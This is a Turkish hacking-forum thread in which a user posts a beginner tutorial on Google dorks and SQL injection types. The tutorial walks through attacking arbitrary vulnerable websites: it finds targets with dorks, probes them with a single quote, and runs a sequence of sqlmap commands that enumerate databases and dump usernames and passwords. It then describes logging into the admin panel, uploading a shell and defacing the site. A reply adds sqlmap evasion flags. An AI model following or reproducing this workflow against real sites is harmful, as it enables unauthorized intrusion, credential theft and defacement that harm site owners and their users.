Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz.. Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.
Sql İnjecti̇on Nedi̇r? Nasıl Kullanılır? Merak Edi̇yorsan Tıkla
<div class="bbWrapper"><i><span style="color: rgb(184, 49, 47)">1)DORK NEDİR?</span></i><br />
<span style="color: rgb(184, 49, 47)"><i><br />
2)SQL İNJECTİON NEDİR?<br />
<br />
2.1)SQL İNJECTİON TÜRLERİ<br />
</i></span><br />
<i><span style="color: rgb(184, 49, 47)">2.2)SQL İNJECTİON NASI YAPILIR?</span></i><br />
<br />
<br />
<br />
<br />
<br />
<b>1)DORK NEDİR?</b><br />
<br />
DORK bilişim sektöründe sql açıklı siteler bulmamıza yardımcı olurlar dorkların çeşitleri vardır örnek wordpress, joomla, sql gibi dork çeşitleri vardır ve<br />
<br />
özel google arama operatörleri<br />
<br />
<b>inurl</b><br />
<br />
Belirtilen terimi url’de arar. Örneğin inurl: “login.php”. gibi<br />
<br />
<br />
<br />
<b>Allintitle</b><br />
<br />
Intitle’a benzer, ancak başlıktaki tüm terimleri arar.<br />
<br />
<br />
<br />
<b>Intitle</b><br />
<br />
belirterek, google’a yalnızca html başlıklarındaki terimleri içeren sayfaları göstermesini söyleyebilirsiniz. Örneğin intitle: “login page“, başlık metninde “login page“ terimine sahip olan sayfaları gösterir.<br />
<br />
<br />
<br />
<b>filetype</b><br />
<br />
<br />
<br />
Belirli türü arıyor. “Filetype: pdf” web sitelerindeki pdf dosyalarını arar. Benzer şekilde “filetype: txt”, .txt uzantılı dosyaları arar.<br />
<br />
<br />
<br />
<b>Ext</b><br />
<br />
filetype’a benzer. “Ext: pdf” pdf uzantı dosyalarını bulunmakta.<br />
<br />
<br />
<br />
<b>intext</b><br />
<br />
Sayfa içeriğini aramaya yarar. Basit bir google araması gibi. Örneğin; intext:”index of /“. gibi<br />
<br />
<br />
<br />
<b>Allintext</b><br />
<br />
intext’e benzer, ancak tüm terimlerin metinde bulunması için araştırma yapıyor.<br />
<br />
<br />
<br />
<b>Site</b><br />
<br />
Aramayı yalnızca belirli bir siteyle sınırlandırır. Site: siberataksavunma.com gibi<br />
<br />
<a href="https://www.nullscp.com/attachments/q6iq2ex-png.936/"
target="_blank"><img src="https://darktr.net/data/attachments/0/629-844296d16d2f0cd3cff5db0ee06630ff.jpg"
class="bbImage "
style=""
alt="q6iq2ex.png"
title="q6iq2ex.png"
width="1630" height="150" loading="lazy" /></a><br />
<br />
<span style="color: rgb(184, 49, 47)">2)SQL İNJECTİON NEDİR?</span><br />
<br />
<br />
SQL İNJECTİON bir exploit türüdür bu exploit türünün amacı sitenin gerekli bilgilerini çekip siteye sızmaktır sql injecton yapmak için (havij, kali linux, parrot, ubuntu vb.) uygulamamalar kullanılabilir benim size önerim kali linux'tur.<br />
<br />
<a href="https://www.nullscp.com/attachments/q6iq2ex-png.935/"
target="_blank"><img src="https://darktr.net/data/attachments/0/628-844296d16d2f0cd3cff5db0ee06630ff.jpg"
class="bbImage "
style=""
alt="q6iq2ex.png"
title="q6iq2ex.png"
width="1630" height="150" loading="lazy" /></a><br />
<br />
<span style="color: rgb(184, 49, 47)">2.1)SQL İNJECTİON TÜRLERİ</span><br />
<br />
<br />
<br />
bant içi (In-band) SQL enjeksiyonları aynı iletişim kanalını kullanır ve iki şekilde gerçekleşir:<br />
<br />
<br />
<br />
-Hata tabanlı (Error-based): Hata tabanlı SQL tekniğidir, uygulama veritabanı sunucuları tarafından atılan hata mesajlarına dayanır. Saldırganlar, hangi sorguların hata mesajları aldığını test ederek, veritabanı yapısına dayalı olarak hedeflenen SQL enjeksiyonları oluşturabilir.<br />
<br />
<br />
<br />
-union based: Bir uygulama SQL injectionun karşı savunmasız olduğunda ve uygulamanın yanıtları bir sorgulama için sonuçları döndürdüğünde, saldırganlar uygulama veritabanının tablolarından veri almak için UNION anahtar sözcüğünü kullanır.<br />
<br />
<br />
<br />
<br />
<br />
Inferential SQL İNJECTİONU, Blind SQL enjeksiyon saldırısı olarak da bilinir. Bu saldırıda, bir veri yükü gönderdikten sonra, saldırgan veritabanının veri yapısını belirlemek için davranışı ve yanıtları gözlemler. İki türde görülür:<br />
<br />
<br />
<br />
-Boole tabanlı: uygulamayı DOĞRU veya YANLIŞ’ın farklı sonuçlarını döndürmeye zorlayan SQL sorguları göndererek, belirli yüklerin meşru sonuçlar döndürüp döndürmediğini anlayabilir.<br />
<br />
<br />
<br />
-Time-based: Zamana dayalı olarak adlandırabileceğimiz bu yöntem, veritabanından yanıt vermeden önce belirli süre beklemesini isteyen SQL sorguları gönderir. Zamana dayalı SQL injection saldırısı, genellikle bir uygulama genel hata mesajları verdiğinde kullanılır. Bu teknik, veritabanını belirli bir süre beklemeye zorlar. Yanıt süresi, saldırganın sorguyu DOĞRU veya YANLIŞ olarak belirlemesine yardımcı olur.<br />
<br />
<br />
<br />
<br />
<br />
Out-of-band SQL enjeksiyon saldırıları en az kullanılan SQL injection tekniğidir. Bant dışı SQL enjeksiyon saldırısı, uygulamanın verileri herhangi bir protokol (HTTP, DNS veya SMB) aracılığıyla iletmesini ister.<br />
<br />
<a href="https://www.nullscp.com/attachments/q6iq2ex-png.937/"
target="_blank"><img src="https://darktr.net/data/attachments/0/630-844296d16d2f0cd3cff5db0ee06630ff.jpg"
class="bbImage "
style=""
alt="q6iq2ex.png"
title="q6iq2ex.png"
width="1630" height="150" loading="lazy" /></a><br />
<br />
<b>2.2)SQL İNJECTİON NASIL YAPILIR?</b><br />
<br />
SQL İNJECTİON yapmak için google arama motoruna sql dorkları yazıp çıkan dorkları ctrl+c ve arama motoruna ctrl+v yaparak kopyala yapıştır eyleminde bulunalım<br />
şimdi karşımıza çıkan sitelerde sql açığı olup olmadığını anlayalım sonu rakam ile biten url lerin sonuna ' (tek tırnak) işareti koyalım eğer hata veriyorsa bu sitede sql açığı vardır şimdi terminalimizi açıp sqlmap'i çalıştıralım çalıştırmak için SQLMAP yazmanız yeterlidir şimdi ise sitenin bilgilerini çekelim<br />
<br />
1. kod<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" --dbs</span><br />
1. kodumuzda sitenin database'ni çekeriz ve ayrıca sitenin url'sini " (çift tırnak) işaretine almanız gerekir ve her işlemden sonra yaptığımız iştemin 1 çubuğunu silip baş harfini büyük yazıcağiz örnek: sqlmap -u "sitenin url'si.com" -D şimdi karşımıza databaseler çıktı benimki vskitchen<br />
<br />
2.kod<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" -D vskitchen --tables</span><br />
bu işlem ile tablo bilgilerini çekeriz karşımıza users vb. bilgiler çıkması lazım çıkmadıysa farklı bir site bulmanız gerekir<br />
<br />
3.kod<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" -D vskitchen -T users --columns</span><br />
bu kodu yazdıktan sonra ise karşımıza birçoğun bilgi çıkabilir ama biz siteye sızacağımız için bu bilgiler arasından users ve password bilgilerini çekmemiz lazım şimdi geçeli 4 ve son kodumuza<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" -D vskitchen -T users -C users,password --dump</span><br />
bu işlem siteyi dump eder yani site bilgilerini sızdırır ve bize sitenin şifresini ve kullanıcı adını verir biz ise bu bilgileri admin paneline girince siteye sızarız ve shell atıp index basar isek siteyi tam manada hacklemiş oluruz<br />
<br />
<br />
<span style="color: rgb(84, 172, 210)"><br />
<b>ByHetero</b></span><b><span style="color: rgb(84, 172, 210)"> Tarafından Yazılmıştır İsimsiz Paylaşmamanızı Rica Ederim</span></b></div>
<div class="bbWrapper"><blockquote data-attributes="member: 5433" data-quote="ByHetero" data-source="post: 23230"
class="bbCodeBlock bbCodeBlock--expandable bbCodeBlock--quote js-expandWatch">
<div class="bbCodeBlock-title">
<a href="/goto/post?id=23230"
class="bbCodeBlock-sourceJump"
rel="nofollow"
data-xf-click="attribution"
data-content-selector="#post-23230">ByHetero' Alıntı:</a>
</div>
<div class="bbCodeBlock-content">
<div class="bbCodeBlock-expandContent js-expandContent ">
<i><span style="color: rgb(184, 49, 47)">1)DORK NEDİR?</span></i><br />
<br />
<span style="color: rgb(184, 49, 47)"><i>2)SQL İNJECTİON NEDİR?<br />
<br />
2.1)SQL İNJECTİON TÜRLERİ</i></span><br />
<br />
<i><span style="color: rgb(184, 49, 47)">2.2)SQL İNJECTİON NASI YAPILIR?</span></i><br />
<br />
<br />
<br />
<br />
<br />
<b>1)DORK NEDİR?</b><br />
<br />
DORK bilişim sektöründe sql açıklı siteler bulmamıza yardımcı olurlar dorkların çeşitleri vardır örnek wordpress, joomla, sql gibi dork çeşitleri vardır ve<br />
<br />
özel google arama operatörleri<br />
<br />
<b>inurl</b><br />
<br />
Belirtilen terimi url’de arar. Örneğin inurl: “login.php”. gibi<br />
<br />
<br />
<br />
<b>Allintitle</b><br />
<br />
Intitle’a benzer, ancak başlıktaki tüm terimleri arar.<br />
<br />
<br />
<br />
<b>Intitle</b><br />
<br />
belirterek, google’a yalnızca html başlıklarındaki terimleri içeren sayfaları göstermesini söyleyebilirsiniz. Örneğin intitle: “login page“, başlık metninde “login page“ terimine sahip olan sayfaları gösterir.<br />
<br />
<br />
<br />
<b>filetype</b><br />
<br />
<br />
<br />
Belirli türü arıyor. “Filetype: pdf” web sitelerindeki pdf dosyalarını arar. Benzer şekilde “filetype: txt”, .txt uzantılı dosyaları arar.<br />
<br />
<br />
<br />
<b>Ext</b><br />
<br />
filetype’a benzer. “Ext: pdf” pdf uzantı dosyalarını bulunmakta.<br />
<br />
<br />
<br />
<b>intext</b><br />
<br />
Sayfa içeriğini aramaya yarar. Basit bir google araması gibi. Örneğin; intext:”index of /“. gibi<br />
<br />
<br />
<br />
<b>Allintext</b><br />
<br />
intext’e benzer, ancak tüm terimlerin metinde bulunması için araştırma yapıyor.<br />
<br />
<br />
<br />
<b>Site</b><br />
<br />
Aramayı yalnızca belirli bir siteyle sınırlandırır. Site: siberataksavunma.com gibi<br />
<br />
<a href="https://www.nullscp.com/attachments/936/" target="_blank">Ekli dosyayı görüntüle 936</a><br />
<br />
<span style="color: rgb(184, 49, 47)">2)SQL İNJECTİON NEDİR?</span><br />
<br />
<br />
SQL İNJECTİON bir exploit türüdür bu exploit türünün amacı sitenin gerekli bilgilerini çekip siteye sızmaktır sql injecton yapmak için (havij, kali linux, parrot, ubuntu vb.) uygulamamalar kullanılabilir benim size önerim kali linux'tur.<br />
<br />
<a href="https://www.nullscp.com/attachments/935/" target="_blank">Ekli dosyayı görüntüle 935</a><br />
<br />
<span style="color: rgb(184, 49, 47)">2.1)SQL İNJECTİON TÜRLERİ</span><br />
<br />
<br />
<br />
bant içi (In-band) SQL enjeksiyonları aynı iletişim kanalını kullanır ve iki şekilde gerçekleşir:<br />
<br />
<br />
<br />
-Hata tabanlı (Error-based): Hata tabanlı SQL tekniğidir, uygulama veritabanı sunucuları tarafından atılan hata mesajlarına dayanır. Saldırganlar, hangi sorguların hata mesajları aldığını test ederek, veritabanı yapısına dayalı olarak hedeflenen SQL enjeksiyonları oluşturabilir.<br />
<br />
<br />
<br />
-union based: Bir uygulama SQL injectionun karşı savunmasız olduğunda ve uygulamanın yanıtları bir sorgulama için sonuçları döndürdüğünde, saldırganlar uygulama veritabanının tablolarından veri almak için UNION anahtar sözcüğünü kullanır.<br />
<br />
<br />
<br />
<br />
<br />
Inferential SQL İNJECTİONU, Blind SQL enjeksiyon saldırısı olarak da bilinir. Bu saldırıda, bir veri yükü gönderdikten sonra, saldırgan veritabanının veri yapısını belirlemek için davranışı ve yanıtları gözlemler. İki türde görülür:<br />
<br />
<br />
<br />
-Boole tabanlı: uygulamayı DOĞRU veya YANLIŞ’ın farklı sonuçlarını döndürmeye zorlayan SQL sorguları göndererek, belirli yüklerin meşru sonuçlar döndürüp döndürmediğini anlayabilir.<br />
<br />
<br />
<br />
-Time-based: Zamana dayalı olarak adlandırabileceğimiz bu yöntem, veritabanından yanıt vermeden önce belirli süre beklemesini isteyen SQL sorguları gönderir. Zamana dayalı SQL injection saldırısı, genellikle bir uygulama genel hata mesajları verdiğinde kullanılır. Bu teknik, veritabanını belirli bir süre beklemeye zorlar. Yanıt süresi, saldırganın sorguyu DOĞRU veya YANLIŞ olarak belirlemesine yardımcı olur.<br />
<br />
<br />
<br />
<br />
<br />
Out-of-band SQL enjeksiyon saldırıları en az kullanılan SQL injection tekniğidir. Bant dışı SQL enjeksiyon saldırısı, uygulamanın verileri herhangi bir protokol (HTTP, DNS veya SMB) aracılığıyla iletmesini ister.<br />
<br />
<a href="https://www.nullscp.com/attachments/937/" target="_blank">Ekli dosyayı görüntüle 937</a><br />
<br />
<b>2.2)SQL İNJECTİON NASIL YAPILIR?</b><br />
<br />
SQL İNJECTİON yapmak için google arama motoruna sql dorkları yazıp çıkan dorkları ctrl+c ve arama motoruna ctrl+v yaparak kopyala yapıştır eyleminde bulunalım<br />
şimdi karşımıza çıkan sitelerde sql açığı olup olmadığını anlayalım sonu rakam ile biten url lerin sonuna ' (tek tırnak) işareti koyalım eğer hata veriyorsa bu sitede sql açığı vardır şimdi terminalimizi açıp sqlmap'i çalıştıralım çalıştırmak için SQLMAP yazmanız yeterlidir şimdi ise sitenin bilgilerini çekelim<br />
<br />
1. kod<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" --dbs</span><br />
1. kodumuzda sitenin database'ni çekeriz ve ayrıca sitenin url'sini " (çift tırnak) işaretine almanız gerekir ve her işlemden sonra yaptığımız iştemin 1 çubuğunu silip baş harfini büyük yazıcağiz örnek: sqlmap -u "sitenin url'si.com" -D şimdi karşımıza databaseler çıktı benimki vskitchen<br />
<br />
2.kod<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" -D vskitchen --tables</span><br />
bu işlem ile tablo bilgilerini çekeriz karşımıza users vb. bilgiler çıkması lazım çıkmadıysa farklı bir site bulmanız gerekir<br />
<br />
3.kod<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" -D vskitchen -T users --columns</span><br />
bu kodu yazdıktan sonra ise karşımıza birçoğun bilgi çıkabilir ama biz siteye sızacağımız için bu bilgiler arasından users ve password bilgilerini çekmemiz lazım şimdi geçeli 4 ve son kodumuza<br />
<br />
<span style="color: rgb(184, 49, 47)">sqlmap -u "sitenin url'si.com" -D vskitchen -T users -C users,password --dump</span><br />
bu işlem siteyi dump eder yani site bilgilerini sızdırır ve bize sitenin şifresini ve kullanıcı adını verir biz ise bu bilgileri admin paneline girince siteye sızarız ve shell atıp index basar isek siteyi tam manada hacklemiş oluruz<br />
<br />
<br />
<br />
<span style="color: rgb(84, 172, 210)"><b>ByHetero</b></span><b><span style="color: rgb(84, 172, 210)"> Tarafından Yazılmıştır İsimsiz Paylaşmamanızı Rica Ederim</span></b>
</div>
<div class="bbCodeBlock-expandLink js-expandLink"><a role="button" tabindex="0">Genişletmek için tıkla ...</a></div>
</div>
</blockquote>Dorkun tanımı sql açıklı siteleri bulmak değildir ve sql açığının bir çok türü vardır + olarak SQL bilmeniz sqli'yi kolaylaştırır. --tamper, --level, --risk, --random-agent gibi komutlarıda gösterseydin keşke neyse başlangıç konusu zaten eline sağlık.</div>
<div class="bbWrapper"><blockquote data-attributes="member: 2094" data-quote="ACE" data-source="post: 23232"
class="bbCodeBlock bbCodeBlock--expandable bbCodeBlock--quote js-expandWatch">
<div class="bbCodeBlock-title">
<a href="/goto/post?id=23232"
class="bbCodeBlock-sourceJump"
rel="nofollow"
data-xf-click="attribution"
data-content-selector="#post-23232">ACE' Alıntı:</a>
</div>
<div class="bbCodeBlock-content">
<div class="bbCodeBlock-expandContent js-expandContent ">
Dorkun tanımı sql açıklı siteleri bulmak değildir ve sql açığının bir çok türü vardır + olarak SQL bilmeniz sqli'yi kolaylaştırır. --tamper, --level, --risk, --random-agent gibi komutlarıda gösterseydin keşke neyse başlangıç konusu zaten eline sağlık.
</div>
<div class="bbCodeBlock-expandLink js-expandLink"><a role="button" tabindex="0">Genişletmek için tıkla ...</a></div>
</div>
</blockquote>Zaten az çok tool a göz atanlar onları görür ama yinede teşekkürler</div>
DarkTr.net 5651 sayılı yasaya göre "yer sağlayıcı" konumunda olup; içeriklerden doğabilecek her türlü sorumluluk yazan kullanıcılara aittir. DarkTr.net; yürütmekte olduğu misyon gereği kişisel verilerin ve Türk internet sitelerinin korunmasından yanadır, bu değerler aleyhinde bir faaliyet göstermemektedir!